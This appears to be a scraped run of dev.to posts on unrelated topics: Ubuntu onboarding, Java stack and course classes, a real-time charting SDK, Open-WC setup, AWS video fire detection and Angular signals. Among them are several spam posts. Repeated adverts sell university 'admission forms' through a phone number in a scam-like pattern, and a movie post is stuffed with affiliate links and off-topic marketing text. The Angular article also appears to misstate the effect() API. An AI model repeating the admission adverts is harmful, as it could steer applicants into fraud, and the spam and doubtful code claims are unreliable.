Recomendamos o uso de [Ubuntu](https://ubuntu.com/download), mesmo que qualquer distro baseada em Debian sirva, nesse artigo todas as referências são feitas pensando na distro Ubuntu.
Você pode instalar Ubuntu como seu OS principal ou fazer um Dual Boot. Aqui deixamos uma recomendação sobre como fazer essa instalação:
[](https://youtu.be/6D6L9Wml1oY?si=t383BQ6LE-inJjNd)
## Interfaces
Todas as interfaces que usamos são encintradas na "app store" do Ubuntu:


O VSCode é usado para escrever o código.

O Postman é usado para fazer requests para a API, testar as rotas.
## CLIs
Para as CLIs, basta seguir as instruções:
- [Git](https://git-scm.com/download/linux)
Depois disso é só configurar o Git seguindo [esse tutorial](https://dev.to/henriqueleite42/git-config-5e35).
## Contas em websites
Basta criar as contas nos seguintes sites usando seu email Anuntech:
- [GitHub](https://github.com), caso você já tenha uma conta pessoal, pode usar essa mesma, basta apenas [adicionar seu email](https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-personal-account-on-github/managing-email-preferences/adding-an-email-address-to-your-github-account) Anuntech a ela.
- É importante também seguir [esse tutorial](https://docs.github.com/en/authentication/connecting-to-github-with-ssh/generating-a-new-ssh-key-and-adding-it-to-the-ssh-agent) para criar uma chave SSH e [esse outro tutorial](https://docs.github.com/en/authentication/connecting-to-github-with-ssh/adding-a-new-ssh-key-to-your-github-account) para adiciona-la a sua conta GitHub.
- [Slack](https://slack.com), nesse caso, você receberá um convite por email, ae basta clicar nele e criar sua conta por lá. Usamos o Slack para comunicação geral, mensagens de texto, chamadas de vídeo e áudio, notificações importantes, etc.
- [Linear](https://linear.app), nesse caso, você receberá um convite por email, ae basta clicar nele e criar sua conta por lá. Usamos o Linear para controlar nosso workflow, nossas tarefas e previsões de entrega.
| henriqueleite42 |
1,878,554 | Case Study on Object-Oriented Thinking | Case Study: Designing the Course Class This section designs a class for modeling courses.... | 0 | 2024-06-05T22:11:04 | https://dev.to/paulike/case-study-on-object-oriented-thinking-3k3c | java, programming, learning, beginners | ## Case Study: Designing the Course Class
This section designs a class for modeling courses. Suppose you need to process course information. Each course has a name and has students
enrolled. You should be able to add/drop a student to/from the course. You can use a class to model the courses, as shown in Figure below.

A **Course** object can be created using the constructor **Course(String name)** by passing a course name. You can add students to the course using the **addStudent(String student)** method, drop a student from the course using the **dropStudent(String student)** method, and return all the students in the course using the **getStudents()** method. Suppose the **Course** class is available; the program below gives a test class that creates two courses and adds students to them.

The **Course** class is implemented in the program below. It uses an array to store the students in the course. For simplicity, assume that the maximum course enrollment is **100**. The array is created using **new String[100]** in line 5. The **addStudent** method (line 12) adds a student to the array. Whenever a new student is added to the course, **numberOfStudents** is increased (line 14). The **getStudents** method returns the array. The **dropStudent** method (line 29) is left as an exercise.

The array size is fixed to be **100** (line 5), so you cannot have more than 100 students in the course. You can improve the class by automatically increasing the array size.
When you create a **Course** object, an array object is created. A **Course** object contains a reference to the array. For simplicity, you can say that the **Course** object contains the array.
The user can create a **Course** object and manipulate it through the public methods **addStudent**, **dropStudent**, **getNumberOfStudents**, and **getStudents**. However, the user doesn’t need to know how these methods are implemented. The **Course** class encapsulates the internal implementation. This example uses an array to store students, but you could use a different data structure to store **students**. The program that uses **Course** does not need to change as long as the contract of the public methods remains unchanged.
## Case Study: Designing a Class for Stacks
This section designs a class for modeling stacks. Recall that a stack is a data structure that holds data in a last-in, first-out fashion, as shown in Figure below.

Stacks have many applications. For example, the compiler uses a stack to process method invocations. When a method is invoked, its parameters and local variables are pushed into a stack. When a method calls another method, the new method’s parameters and local variables are pushed into the stack. When a method finishes its work and returns to its caller, its associated space is released from the stack.
You can define a class to model stacks. For simplicity, assume the stack holds the **int** values. So name the stack class **StackOfIntegers**. The UML diagram for the class is shown in Figure below.

Suppose that the class is available. The test program below uses the class to create a stack (line 6), store ten integers **0**, **1**, **2**, . . . , and **9** (line 9), and displays them in reverse order (line 12).

How do you implement the **StackOfIntegers** class? The elements in the stack are stored in an array named **elements**. When you create a stack, the array is also created. The no-arg constructor creates an array with the default capacity of **16**. The variable **size** counts the number of elements in the stack, and **size – 1** is the index of the element at the top of the stack, as shown in Figure below. For an empty stack, **size** is **0**.

The **StackOfIntegers** class is implemented in the program below. The methods **empty()**, **peek()**, **pop()**, and **getSize()** are easy to implement. To implement **push(int value)**, assign **value** to **elements[size]** if **size < capacity** (line 26). If the stack is full (i.e., **size >= capacity**), create a new array of twice the current capacity (line 21), copy the contents of the current array to the new array (line 22), and assign the reference of the new array to the current array in the stack (line 23). Now you can add the new value to the array (line 26).
```
package demo;
public class StackOfIntegers {
private int[] elements;
private int size;
public static int DEFAULT_CAPACITY = 16;
/** Construct a stack with the default capacity 16 */
public StackOfIntegers() {
this (DEFAULT_CAPACITY);
}
/** Construct a stack with the specified maximum capacity */
public StackOfIntegers(int capacity) {
elements = new int[capacity];
}
/** Push a new integer to the top of the stack */
public void push(int value) {
if(size >= elements.length) {
int[] temp = new int[elements.length * 2];
System.arraycopy(elements, 0, temp, 0, elements.length);
elements = temp;
}
elements[size++] = value;
}
/** Return and remove the top element from the stack */
public int pop() {
return elements[--size];
}
/** Return top element from the stack */
public int peek() {
return elements[size - 1];
}
/** Test whether the stack is empty */
public boolean empty() {
return size == 0;
}
/** Return the number of elements in the stack */
public int getSize() {
return size;
}
}
``` | paulike |
1,874,984 | Introducing Adashta: Server-Side Real-Time Charting & More | We are thrilled to announce the launch of Adashta, an advanced SDK designed to simplify real-time... | 0 | 2024-06-05T22:10:59 | https://dev.to/adashta/introducing-adashta-server-side-real-time-charting-more-2jb3 | javascript, node, opensource, productivity | We are thrilled to announce the launch of Adashta, an advanced SDK designed to simplify real-time communication for developers. With Adashta, you can focus on your core business logic while we handle the intricacies of real-time data streaming. Our goal is to make it easier than ever to integrate real-time functionalities into your applications.
## Why Adashta?
In the ever-evolving landscape of web development, real-time communication has become a critical component for delivering dynamic and responsive user experiences. Whether you're building a live data dashboard, a collaborative tool, or a real-time notification system, Adashta has you covered.
## Adashta Charts

One of Adashta's standout features is Adashta Charts, **a server-side charting solution** that enables you to create real-time charts with little to no frontend coding. With Adashta Charts, you can:
- Generate various chart types, including line, bar, and pie charts.
- Update charts in real-time with new data from server.
## Getting Started
### Server-Side Installation and Initialization
To get started with Adashta on the server side, follow these simple steps:
1. Install Adashta via npm:
```bash
npm install adashta
```
2. Initialize Adashta:
```javascript
const { Adashta } = require('adashta');
const adashta = new Adashta({
adashtaHost: 'localhost',
adashtaPort: '3011'
});
const loadAdashta = async () => {
adashta.on('connection', async (clientId) => {
console.log('Client connected', clientId);
});
adashta.on('disconnection', async (clientId) => {
console.log('Client disconnected', clientId);
});
};
loadAdashta();
```
### Client-Side Integration
1. Include Adashta SDK in Your HTML:
```html
<script type="module">
import { Adashta } from 'https://cdn.skypack.dev/adashta-js';
</script>
```
2. Initialize Adashta in the Client:
```javascript
const adashta = new Adashta({
adashtaHost: 'localhost',
adashtaPort: 3011
});
```
No extra configuration is needed on the client side. Adashta will automatically connect to the server and handle real-time communication between the server and client.
### Creating Real-Time Charts
Wooho! You're all set up with Adashta on the server and client sides. Now, let's see how you can create real-time charts with Adashta Charts.
1. Define Your Chart:
```javascript
const chart = {
chartId: 'dummy-company-stock-chart',
querySelector: '.chart',
chartData: {
type: 'line',
data: {
labels: ['Day 1'],
datasets: [{
label: 'Dummy Company Stock Price',
data: [350],
borderWidth: 2
}]
},
options: {
scales: {
y: {
title: {
display: true,
text: 'Share Price ($)'
}
},
x: {
title: {
display: true,
text: 'Days'
},
ticks: {
autoSkip: true,
maxTicksLimit: 10,
}
}
}
}
}
};
```
2. Send Chart Data to Client:
```javascript
await adashta.charts().produce(clientId, chart);
```
3. Update Chart Data:
```javascript
chart.chartData.data.labels.push(`Day ${days}`);
chart.chartData.data.datasets[0].data.push(getRandomInt(300, 800));
await adashta.charts().produce(clientId, chart);
```
4. Complete Example:
```javascript
const { Adashta } = require('adashta');
const adashta = new Adashta({
adashtaHost: 'localhost',
adashtaPort: '3011'
});
const loadAdashta = async () => {
const clientIdInterval = {};
adashta.on('connection', async (clientId) => {
const chart = {
chartId: 'dummy-company-stock-chart',
querySelector: '.chart',
chartData: {
type: 'line',
data: {
labels: ['Day 1'],
datasets: [{
label: 'Dummy Company Stock Price',
data: [350],
borderWidth: 2
}]
},
options: {
scales: {
y: {
title: {
display: true,
text: 'Share Price ($)'
}
},
x: {
title: {
display: true,
text: 'Days'
},
ticks: {
autoSkip: true,
maxTicksLimit: 10,
}
}
}
}
}
};
await adashta.charts().produce(clientId, chart);
let days = 2;
clientIdInterval[clientId] = setInterval(async () => {
chart.chartData.data.labels.push(`Day ${days}`);
chart.chartData.data.datasets[0].data.push(getRandomInt(300, 800));
await adashta.charts().produce(clientId, chart);
days++;
}, 2000);
});
adashta.on('disconnection', async (clientId) => {
clearInterval(clientIdInterval[clientId]);
delete clientIdInterval[clientId];
console.log('Client disconnected', clientId);
});
};
function getRandomInt(min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
loadAdashta();
```
5. Run Your Adashta Server:
```bash
node index.js
```
6. Open Your HTML File in a Browser: HTTP server is required to serve the HTML file. You can use `http-server` or any other HTTP server of your choice.
With Adashta, integrating real-time charts into your application has never been easier. You can dynamically update charts with new data, providing users with up-to-the-minute information.
## Join the Adashta Community
Adashta is an open-source project, and we welcome contributions and feedback from the developer community. If you have any questions or suggestions, please feel free to reach out to us at hello@adashta.co. You can also contribute to the project by visiting our [GitHub](https://github.com/adashta/adashta) repository.
We are excited to see how you will use Adashta to create engaging, real-time experiences for your users. Thank you for choosing Adashta, and happy coding!
Feel free to share your thoughts and experiences with Adashta in the comments below. We're eager to hear how Adashta is making a difference in your projects! | kalpitrathore |
1,878,552 | Knox Goes Away | Starring Kris Kristofferson and Willie Nelson. Two aging gunfighters re-form their old gang to avenge... | 0 | 2024-06-05T22:07:44 | https://dev.to/klodia_12/knox-goes-away-1c08 | javascript, webdev, tutorial, ai | Starring Kris Kristofferson and Willie Nelson. Two aging gunfighters re-form their old gang to avenge the murder of one of the former member
Knox Goes Away
After a hit man (Michael Keaton) is diagnosed with dementia, he must race against the police to save his estranged son, and outrun the ticking clock of his own deteriorating mind.
208IMDb 6.91 h 54 min2024
X-RAYUHDR
**[
[Starring Kris Kristofferson and Willie Nelson. Two aging gunfighters re-form their old gang to avenge the murder of one of the
Welcome to my Pinterest! Explore a world of creativity, inspiration, and unique ideas. From home decor and fashion to DIY projects and delicious recipes, find endless pins to spark your imagination and bring your passions to life. Follow me for daily inspiration and let's create something beautiful together!
Tags: #HomeDecor #FashionInspiration #DIYProjects #DeliciousRecipes #CreativeIdeas #DailyInspiration #Crafts #InteriorDesign #Style #Foodie #Handmade #Travel #Wellness #Art #Beauty
https://amzn.to/3KwnqdcInscription sur JVZoo : Créez un compte sur la plateforme JVZoo. L'inscription est gratuite et rapide.
Choisir un produit : Parcourez le marketplace JVZoo pour trouver des produits à promouvoir. Choisissez des produits qui correspondent à votre audience et qui ont de bonnes évaluations et taux de conversion.
Obtenir des liens d'affiliation : Une fois que vous avez sélectionné un produit, demandez l'approbation du vendeur pour obtenir votre lien d'affiliation unique. Ce lien suivra les ventes générées par vos recommandations.
Promouvoir les produits : Utilisez votre lien d'affiliation pour promouvoir le produit via divers canaux tels que les blogs, les réseaux sociaux, les vidéos YouTube, les emails marketing, et les publicités payantes. Assurez-vous de fournir des informations précises et attrayantes sur le produit pour inciter les achats.
Suivre et optimiser : Utilisez les outils d’analyse de JVZoo pour suivre vos performances. Analysez quelles stratégies fonctionnent le mieux et ajustez vos efforts de marketing en conséquence.
En suivant ces étapes, vous pouvez commencer à gagner des commissions sur les ventes des produits que vous promouvez sur JVZoo.
https://www.getresponse.com?a=6N9FqjpKCMStarring Kris Kristofferson and Willie Nelson. Two aging gunfighters re-form their old gang to avenge the murder of one of the former memberhttps://amzn.to/3V7aRdd【Comfortable & Breathable & Quick Dry】 Our hiking shorts men are made with highly breathable,Hiauspor Men's Hiking Cargo Shorts 9"/10" Quick Dry Lightweight Waterproof for Golf Tactical Fishing Casual with 6 Pocketshttps://www.jvzoo.com/newaffiliates/affiliatedashboardhttps://amzn.to/4aK9EhE | klodia_12 |
1,878,551 | Babcock University,Ilishan-Remo 2024/2025 Session Admission forms | Babcock University,Ilishan-Remo 2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA for... | 0 | 2024-06-05T22:04:58 | https://dev.to/admin_dept_202e474d82b68c/babcock-universityilishan-remo-20242025-session-admission-forms-1c9d | webdev, beginners, programming | Babcock University,Ilishan-Remo 2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA for purchase of the form and how to register on-line The general public is hereby informed that application forms for admission into the degree Programme 2024-2025 academic session. NURSING ADMISSION FORMS,INTER SCHOOL TRANSFER FORM,DIRECT ENTRY FORMS,MASTERS AND PHD FORMS,& PART-TIME FORMS are out and on sales in the school premises. Call the School Admin.DR.Mrs Anita on☎️ 07065086538 for more details on how to apply and register online. The School Authority 07065086538
requires all candidates applying for admission into any of its courses to possess Five (5) O' Level Credit Level Passes at not more than two (2) sittings to include English Language and Mathematics and three (3) other subjects relevant to course. | admin_dept_202e474d82b68c |
1,878,550 | Knox Goes Away | Starring Kris Kristofferson and Willie Nelson. Two aging gunfighters re-form their old gang to avenge... | 0 | 2024-06-05T22:04:50 | https://dev.to/klodia_12/knox-goes-away-130k | javascript, beginners, tutorial, ai | Starring Kris Kristofferson and Willie Nelson. Two aging gunfighters re-form their old gang to avenge the murder of one of the former member
Knox Goes Away
After a hit man (Michael Keaton) is diagnosed with dementia, he must race against the police to save his estranged son, and outrun the ticking clock of his own deteriorating mind.
208IMDb 6.91 h 54 https://amzn.to/4e7eSqH | klodia_12 |
1,854,457 | How to detect Forest fires using Kinesis Video Streams and Amazon Rekognition | Introduction On a hot summer night, while we were enjoying our food and drinks, the dogs... | 0 | 2024-06-05T22:01:55 | https://dev.to/aws-builders/how-to-detect-forest-fires-using-kinesis-video-streams-and-rekognition-4he8 | aws, kinesis, rekognition, globallogic | #Introduction#
On a hot summer night, while we were enjoying our food and drinks, the dogs suddenly began barking and staring at a certain direction. We got outside to have a better look and noticed that the sky had started to turn orange. We immediately knew what it was happening, there was a huge fire at a beautiful forest a few miles away. This was happening almost every summer, at different places, wiping out forests and destroying homes, with a massive impact on the environment and people's lives.
Having seen the aftermath and the years it took for the burnt areas and people to recover, I decided to build something to detect smoke and fire and help reduce the destructive impact. After all, early detection plays a crucial role when it comes to forest fires.
#Challenges#
Waiting for a Real-time scenario, like the one described above, was not an option or desirable for testing my solution. To overcome this challenge, i decided to simulate the required conditions.
I used my laptop and played YouTube videos of forest fires as the source. This approach allowed me to consistently recreate the visual characteristics of forest fires, use specific scenes, thus ensuring that my solution was tested thoroughly under different conditions. This approach provided a reliable and efficient way to validate my solution and demonstrate how it could possibly handle similar real-time scenarios.

#Prerequisites#
Here is a brief overview of the AWS services and components used in the solution:
**RTSP Camera**
An IP/CCTV camera
**Raspberry Pi**
This acts as a local gateway to connect the camera and manage the video stream up to Amazon Kinesis Video Streams. It is using certificates generated by AWS IoT Core to authenticate itself securely to AWS services.
**AWS IoT**
Set up an IoT Thing to represent my IP camera. This involved configuring the certificates and policies for secure communication between the IP camera and AWS IoT. It is an important component in creating a secure and manageable architecture for streaming video from an RTSP camera through a Raspberry Pi to Kinesis Video Streams.

**Kinesis Video Stream KVS**
Kinesis Video Stream to ingest live video from the RTSP camera (with a matching name to the IoT Thing).

**Amazon Rekognition**
Trained a Rekognition Custom Labels model to detect smoke and fire in images. Training takes some time, depending on the size of the dataset. (The ARN is used in Lambda functions).

**S3**
Created an S3 bucket to store the extracted images from the IP camera, with the appropriate bucket policies to allow read/write access from the AWS services used.

**Lambda**
Wrote a Lambda function to processes images stored in S3, detect smoke and fire using Rekognition, and trigger an SNS notification.

**SNS**
If smoke or fire is detected by the Rekognition Custom Labels model, the Lambda function triggers a notification using Amazon Simple Notification Service (SNS). SNS can then deliver the notification to subscribed endpoints, such as email, SMS, or mobile push notifications.

**IAM Roles**
Created the required IAM roles and policies for Kinesis Video Streams, Rekognition, Lambda, IoT, S3, and SNS. As per best practices, least privilege principles were applied.
**Producer SDK - GStreamer plugin**
The GStreamer plugin for Kinesis Video Streams is a component that integrates GStreamer with Amazon Kinesis Video Streams.
#Solution Overview and walkthrough#
Here is a brief overview about how the solution works.

The first thing to do is to start the Amazon Rekognition Model that we trained.

Next, we need to setup the RTSP camera and test the stream, using VLC. Then we move on and configure the GStreamer plugin in the Raspberry-Pi.
We have to transfer the certificates to the Raspberry Pi and place them in a specific directory.
Obtain the IoT credential endpoint using AWS CloudShell or awscli:
```
aws iot describe-endpoint --endpoint-type iot:CredentialProvider
```

The next step is to set the environment variables for the region, certificate paths, and role alias:
```
export AWS_DEFAULT_REGION=eu-west-1
export CERT_PATH=certs/certificate.pem.crt
export PRIVATE_KEY_PATH=certs/private.pem.key
export CA_CERT_PATH=certs/AmazonRootCA1.pem
export ROLE_ALIAS=CameraIoTRoleAlias
export IOT_GET_CREDENTIAL_ENDPOINT=cxxxxxxxxxxs.credentials.iot.eu-west-1.amazonaws.com
```
Now we can execute the GStreamer command and start streaming to Kinesis Video Streams:
```
./kvs_gstreamer_sample FireDetection rtsp://username:password@192.168.1.100/stream1
```
With the video feed successfully streaming to Kinesis Video Streams, it's time to start extracting the images from the stream.
Kinesis Video Streams simplifies this process by automatically transcoding and delivering images. It extracts images from video data in real-time based on tags and delivers them to a specified S3 bucket.
To use that feature, we need to create a JSON file named ***update-image-generation-input.json*** with the required config.
```
{
"StreamName": "FireDetection",
"ImageGenerationConfiguration":
{
"Status": "ENABLED",
"DestinationConfig":
{
"DestinationRegion": "eu-west-1",
"Uri": "s3://images-bucket-name"
},
"SamplingInterval": 200,
"ImageSelectorType": "PRODUCER_TIMESTAMP",
"Format": "JPEG",
"FormatConfig": {
"JPEGQuality": "80"
},
"WidthPixels": 1080,
"HeightPixels": 720
}
}
```
and run the following command in awscli
```
aws kinesisvideo update-image-generation-configuration \
--cli-input-json file://./update-image-generation-input.json \
```
If we check our S3 bucket we can see the extracted images

Our Lambda function is now going to be triggered and will start processing them using Amazon Rekognition. This allows for identifying smoke/fire objects within the images and triggering notifications based on detected objects.

#Conclusion#
We now have a solution where our IP camera streams video to a Kinesis Video Stream. AWS Lambda processes frames from this stream, using Amazon Rekognition Custom Labels to detect smoke and fire. Detected events are then triggering SNS.
By integrating Amazon Rekognition with custom labels, Kinesis Video Streams, S3, and AWS IoT, we can create a powerful image recognition system for many use cases.
For a more detailed walkthrough, feel free to contact me. | ngargoulakis |
1,878,549 | JavaScript is the best type of code | A post by Yuvaan | 0 | 2024-06-05T22:00:26 | https://dev.to/bharatrolling/javascript-is-the-best-type-of-code-5f49 | bharatrolling | ||
1,878,547 | Baze University,2024/2025 Session Admission forms is out | Baze University,2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA for purchase of the... | 0 | 2024-06-05T21:54:07 | https://dev.to/admin_dept_202e474d82b68c/baze-university20242025-session-admission-forms-is-out-4j92 | webdev, beginners, programming, tutorial | Baze University,2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA for purchase of the form and how to register on-line The general public is hereby informed that application forms for admission into the degree Programme 2024-2025 academic session. NURSING ADMISSION FORMS,INTER SCHOOL TRANSFER FORM,DIRECT ENTRY FORMS,MASTERS AND PHD FORMS,& PART-TIME FORMS are out and on sales in the school premises. Call the School Admin.DR.Mrs Anita on☎️ 07065086538 for more details on how to apply and register online. The School Authority 07065086538
requires all candidates applying for admission into any of its courses to possess Five (5) O' Level Credit Level Passes at not more than two (2) sittings to include English Language and Mathematics and three (3) other subjects relevant to course. | admin_dept_202e474d82b68c |
1,878,546 | Bells University of Technology, Otta,2024/2025 Session Admission forms | Bells University of Technology, Otta,2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA... | 0 | 2024-06-05T21:53:27 | https://dev.to/admin_dept_202e474d82b68c/bells-university-of-technology-otta20242025-session-admission-forms-oa0 | Bells University of Technology, Otta,2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA for purchase of the form and how to register on-line The general public is hereby informed that application forms for admission into the degree Programme 2024-2025 academic session. NURSING ADMISSION FORMS,INTER SCHOOL TRANSFER FORM,DIRECT ENTRY FORMS,MASTERS AND PHD FORMS,& PART-TIME FORMS are out and on sales in the school premises. Call the School Admin.DR.Mrs Anita on☎️ 07065086538 for more details on how to apply and register online. The School Authority 07065086538
requires all candidates applying for admission into any of its courses to possess Five (5) O' Level Credit Level Passes at not more than two (2) sittings to include English Language and Mathematics and three (3) other subjects relevant to course. | admin_dept_202e474d82b68c | |
1,878,545 | Benson Idahosa University, Benin City,2024/2025 Session Admission forms | Benson Idahosa University, Benin City,2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA... | 0 | 2024-06-05T21:45:12 | https://dev.to/admin_dept_202e474d82b68c/benson-idahosa-university-benin-city20242025-session-admission-forms-3ead | school, universirty | Benson Idahosa University, Benin City,2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA for purchase of the form and how to register on-line The general public is hereby informed that application forms for admission into the degree Programme 2024-2025 academic session. NURSING ADMISSION FORMS,INTER SCHOOL TRANSFER FORM,DIRECT ENTRY FORMS,MASTERS AND PHD FORMS,& PART-TIME FORMS are out and on sales in the school premises. Call the School Admin.DR.Mrs Anita on☎️ 07065086538 for more details on how to apply and register online. The School Authority 07065086538
requires all candidates applying for admission into any of its courses to possess Five (5) O' Level Credit Level Passes at not more than two (2) sittings to include English Language and Mathematics and three (3) other subjects relevant to course. | admin_dept_202e474d82b68c |
807,219 | Tutorial: Getting Started with Open-wc | Open-WC, also known as Open Web-components is vital to getting you started on web-programming! It... | 0 | 2021-08-30T00:15:00 | https://dev.to/haileyhahnnnn/tutorial-getting-started-with-open-wc-4mk2 | Open-WC, also known as Open Web-components is vital to getting you started on web-programming! It utilizes various ideas on how to build web-components and is accessible for any one interested and ready to learn! Now, let's get started.
**Tools Needed**
Listed bellow are the tools needed to get started with Open-wc:
1. A computer which you have full admin rights.
2. Basic understanding of how to navigate through your device
3. Basic understanding of how to run terminal commands
**Installing VSCode**
For this tutorial, we will start by downloading the IDE aka. VSCode. Some programmers prefer other IDE's which is also completely fine. VSCode is great because it is available for free downloads on Mac's and Window PC's,etc. If interested in VSCode, click this link([https://code.visualstudio.com/]) which brings you to the free download. Once you find the correct download for your computer(Windows/mac/etc), click download and install.
When you first open the application, it will ask for permission from the owner of the PC to access certain levels of your folder structure. Please grant access, otherwise the IDE cannot be used on your PC. Overall, this is usually a very easy process.
**Installing NodeJS with NPM**
Note: NodeJS comes with npm(node package manager) so you do not have to preform a separate installation for that.
Click here to install NodeJS: [https://nodejs.org/en/]
Once you reach the site, find the correct download for your PC and hit download. Follow the instructions to finish out the installation of NodeJS. Following the instructions are quite simple and easy. If you would like to check to make sure everything is downloaded correctly, you can proceed to your terminal and type `node -v` and `npm-v`. If you have installed everything correctly, you will receive the version number in response.
**Installing Yarn**
The next step is installing Yarn to your PC. To start off click this link: [https://yarnpkg.com/]
Once you have the website opened up, you must open up the terminal in your PC. Once your terminal is opened up, use the following command that utilizes the npm that we had previously installed.
```npm install -global yarn```
In the rare case that you run into permission error while installing Yarn, type `sudo` in front of your initial command line which would print as
```sudo npm install -global yarn```
**Install Open-wc boilerplate**
Congrats! You have made it to the final step of this tutorial. We are now ready to set up our open-wc with these last few steps:
1. Chose a location on your local machine. I prefer to use a folder on my desktop. This is where you will install and access the boilerplates.
2. Once you have created a folder, go back and open your terminal and navigate yourself to the correct level and folder.
3. Run `npm init @open-wc` (use `sudo` if you get denied access)
4. When the download begins you will be prompted with four questions. You want to select:
- Scaffold a new project
- Web Components, Linting
- No(for TypeScript)
- Type in LOWERCASE"hello-world" for your tag name
- yes for the disk
- yes for installing with yarn
Congrats, you have completed the download of open-wc! If you have any other questions/comments please leave them bellow! I hope you enjoy your web programming journey!
| haileyhahnnnn | |
1,878,544 | Bingham University,Karu,2024/2025 Session Admission forms i | Bingham University,Karu,2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA for purchase... | 0 | 2024-06-05T21:44:11 | https://dev.to/admin_dept_202e474d82b68c/bingham-universitykaru20242025-session-admission-forms-i-59e1 | webdev, javascript | Bingham University,Karu,2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA for purchase of the form and how to register on-line The general public is hereby informed that application forms for admission into the degree Programme 2024-2025 academic session. NURSING ADMISSION FORMS,INTER SCHOOL TRANSFER FORM,DIRECT ENTRY FORMS,MASTERS AND PHD FORMS,& PART-TIME FORMS are out and on sales in the school premises. Call the School Admin.DR.Mrs Anita on☎️ 07065086538 for more details on how to apply and register online. The School Authority 07065086538
requires all candidates applying for admission into any of its courses to possess Five (5) O' Level Credit Level Passes at not more than two (2) sittings to include English Language and Mathematics and three (3) other subjects relevant to course. | admin_dept_202e474d82b68c |
1,878,543 | Bowen University, Iwo,2024/2025 Session Admission forms | Bowen University, Iwo,2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA for purchase of... | 0 | 2024-06-05T21:38:40 | https://dev.to/admin_dept_202e474d82b68c/bowen-university-iwo20242025-session-admission-forms-17ob | sql, codepen, rust, git | Bowen University, Iwo,2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA for purchase of the form and how to register on-line The general public is hereby informed that application forms for admission into the degree Programme 2024-2025 academic session. NURSING ADMISSION FORMS,INTER SCHOOL TRANSFER FORM,DIRECT ENTRY FORMS,MASTERS AND PHD FORMS,& PART-TIME FORMS are out and on sales in the school premises. Call the School Admin.DR.Mrs Anita on☎️ 07065086538 for more details on how to apply and register online. The School Authority 07065086538
requires all candidates applying for admission into any of its courses to possess Five (5) O' Level Credit Level Passes at not more than two (2) sittings to include English Language and Mathematics and three (3) other subjects relevant to course. | admin_dept_202e474d82b68c |
1,878,542 | Caleb University, Lagos,2024/2025 Session Admission forms | Caleb University, Lagos,2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA for purchase... | 0 | 2024-06-05T21:37:57 | https://dev.to/admin_dept_202e474d82b68c/caleb-university-lagos20242025-session-admission-forms-658 | web3, flutter, gamedev | Caleb University, Lagos,2024/2025 Session Admission forms is out☎️ 07065086538 Dr ANITA for purchase of the form and how to register on-line The general public is hereby informed that application forms for admission into the degree Programme 2024-2025 academic session. NURSING ADMISSION FORMS,INTER SCHOOL TRANSFER FORM,DIRECT ENTRY FORMS,MASTERS AND PHD FORMS,& PART-TIME FORMS are out and on sales in the school premises. Call the School Admin.DR.Mrs Anita on☎️ 07065086538 for more details on how to apply and register online. The School Authority 07065086538
requires all candidates applying for admission into any of its courses to possess Five (5) O' Level Credit Level Passes at not more than two (2) sittings to include English Language and Mathematics and three (3) other subjects relevant to course. | admin_dept_202e474d82b68c |
1,878,541 | Understanding Reactive Contexts in Angular 18 | A Deep Dive into Managing State Reactivity and Signals Defining a Reactive... | 0 | 2024-06-05T21:33:41 | https://dev.to/diegoquesadadev/understanding-reactive-contexts-in-angular-18-17b9 | angular, signals, reactive, frontend | #### *A Deep Dive into Managing State Reactivity and Signals*
---
### Defining a Reactive Context and Its Importance for Signals
In Angular 18, the concept of Reactive Contexts is fundamental to efficiently managing signals and state reactivity within applications. A Reactive Context is essentially an environment where changes to signals (reactive state variables) can be monitored and reacted to, ensuring that the UI stays in sync with the underlying state.
#### Why are Reactive Contexts Essential?
Reactive Contexts provide a controlled way to handle the propagation of changes. This is crucial because:
* **Efficiency:** They help minimize unnecessary computations and DOM updates.
* **Consistency:** They ensure the UI reflects the most current state without glitches.
* **Scalability:** They allow for more scalable state management by localizing reactivity.
---
### Utilizing the Effect Function to Establish a Reactive Context
The `effect` function in Angular is used to create a Reactive Context that listens for changes in specified signals and executes a callback when those changes occur.
**Example**
```typescript
import { effect, signal } from '@angular/core';
const count = signal(0);
const unsubscribe = effect(() => {
console.log(`Count value is: ${count()}`);
});
count.set(1); // Logs: "Count value is: 1"
unsubscribe(); // Stop listening for changes
```
> In this example, the `effect` function sets up a Reactive Context that logs the value of `count` whenever it changes. The `effect` function ensures that the Reactive Context is kept up to date with any changes to the signals it monitors.
---
### Reactive Contexts in Angular Templates: How They Operate
In Angular templates, Reactive Contexts are implicitly created and managed. When you use Angular’s template syntax to bind to signals, Angular sets up a Reactive Context that ensures the template updates whenever the bound signals change.
**Example**
```html
<div>{{ count() }}</div>
<button (click)="count.set(count() + 1)">Increment</button>
```
> Here, the template creates a Reactive Context for the `count` signal. Whenever `count` changes, the div's content is automatically updated.
---
### Distinguishing Between Effect Functions and Template Reactive Contexts
While both `effect` functions and template bindings create Reactive Contexts, there are subtle differences in how they operate:
* **`effect` Function:** Explicitly defines a Reactive Context in your JavaScript/TypeScript code, giving you fine-grained control over what and how things react to changes.
* **Template Reactive Contexts:** Implicitly managed by Angular, focusing on keeping the UI in sync with the state without the need for explicit setup.
---
### Understanding Why Effect Functions Trigger More Frequently Than Templates
One notable behavior is that `effect` functions can be triggered more frequently than template updates. This can happen because:
* **Granular Reactivity:** effect functions react to every signal change they are subscribed to, regardless of whether the changes are relevant to the UI.
* **Batching:** Angular’s template engine often batches updates to minimize DOM manipulations, while effect functions respond immediately to state changes.
#### Why This Behavior is Not Problematic
Frequent triggers in `effect` functions are generally not an issue because:
* **Controlled Scope:** They usually handle non-UI side effects where immediate reactions are desirable.
* **Performance Optimization:** Angular’s internal mechanisms ensure these triggers are handled efficiently, without causing performance bottlenecks.
---
### Conclusion
